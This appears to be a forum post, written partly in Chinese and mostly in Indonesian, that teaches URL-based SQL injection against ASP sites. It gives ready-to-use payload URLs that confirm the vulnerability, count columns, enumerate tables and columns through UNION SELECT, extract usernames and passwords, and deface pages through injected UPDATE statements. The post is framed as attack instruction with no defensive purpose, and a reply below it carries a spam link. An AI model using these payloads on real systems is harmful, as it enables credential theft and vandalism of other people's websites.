SQL 常用的注入技巧

韩小末

常看到的攻击方式
1.从表单输入
2.从网址URL输入
1. through form input
2. through url

我们在这里讨论的是如何通过URL注入！

经常使用到的命令：
1. ORDER BY |知道有多少栏位
2. UNION SELECT | 从该表或栏位列信息
3. AND |用于比较真或假的条件
4. OR | 1 conditions to determine the course
5. - | To close the command
6. + | To space
7. '| Characters evil
8. HAVING | to display the error
9. DATABASE () | to know the name of the database
10. USER () | to know the name of the database user
11. Datadir () | to know the position where the database
12. CONCAT | to combine 2 or more column
13. GROUP_CONCAT | to display the group from the combined column
14. CONCAT_WS | same as concat
15. FROM | retrieve data from
16. UPDATE | modify existing data
17. @ @ servername |

attack 1
========

1.cari tau apakah vulnerable

- www.site.com/news.asp?ArticleID=10+AND+1=0--
error
- www.site.com/news.asp?ArticleID=10+AND+1=1--
tidak error, berarti command bekerja situs = vulnerable, mode inject = on :)

2. cari tau jumlah column yang di tampilkan dalam suatu page

- www.site.com/news.asp?ArticleID=10+ORDER+BY+1--
normal
- www.site.com/news.asp?ArticleID=10+ORDER+BY+2--
normal, ulangi sampai error
- www.site.com/news.asp?ArticleID=10+ORDER+BY+4--
normal
- www.site.com/news.asp?ArticleID=10+ORDER+BY+5--
error, berarti jumlah column 4 karena error di nomor 5

3. menampilkan nama table

- www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,3,4+FROM+INFORMATION_SCHEMA.TABLES--

ganti nomor id ke negatif contoh nya "1" , akan tampil nomor rahasia di dalam page, nomor itu jadi kunci kita mencari nama table dan lain2
disini saya contohkan tampil nomor 3

- www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,table_name,4+FROM+INFORMATION_SCHEMA.TABLES--

hasil nya akan tampil satu nama table kita contoh kan "news"

4. mencari table yang di inginkan

- www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,table_name,4+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_name+news--

table yang tampil tadi adalah "news" kita tambah kan table news di ujung syntax untuk mencari nama table yang kita ingin kan, misal nya table "users"
ulangi langkah ini sampai kita dapatkan table "users"

5. menampilkan nama column

-www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,column_name,4+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='users'--
akan tampil satu nama column misalnya "id" sedangkan kita mencari nama column seperti username,password, ulangin seperti langkah mencari table di atas
- www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,column_name,4+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='Users'+AND+column_name+'id'--

6. menampilkan data

kita sudah tau nama table dan column nya, misalnya nama table "user" dan nama column "username","password"
sekarang saat nya kita melihat data yang ada dalam table dan column tersebut
- www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,username,4+FROM+Users--
hasil = jhon
- www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,2,password,4+FROM+Users--
hasil = santrina

kesimpulan,
kita dapatkan satu user dengan username = jhon dan password = santrina
==========================================================================

Attack 2
========

1. cari nama table dan nama column

- www.site.com/news.asp?ArticleID=10+HAVING+1=1--
kita dapatkan sebuah pesan error

"Column 'news.id' is invalid in the select list because it is not contained in
an aggregate function and there is no GROUP BY clause."

dari situ kita tau ada table yang nama nya "news" dan ada column "id" didalamnya

2. cari column yang kita ingin kan

- www.site.com/news.asp?ArticleID=10+GROUP+BY+id+HAVING+1=1--
kita gunakan command group by untuk manampilkan nama colum berikut nya
kita liat pesan error
"Column 'news.title' is invalid in the select list because it is not contained in
an aggregate function and there is no GROUP BY clause."

3. mengganti tittle situs

- www.site.com/news.asp?ArticleID=10+UPDATE+news+set+title='Hacked by Crash'--
perintah diatas akan menyebabkan semua title article manjadi hacked by crash
- www.site.com/news.asp?ArticleID=10+UPDATE+news+set+title='Hacked by Crash'+WHERE+id=10—
perintah ini kan mengganti title article nomor 10 aja!
=====================================================================

升芙杉

这个贴要跟~~~~非常不错！
热血江湖[url=http://www.52wpe.net]私服[/url]

楼主加油！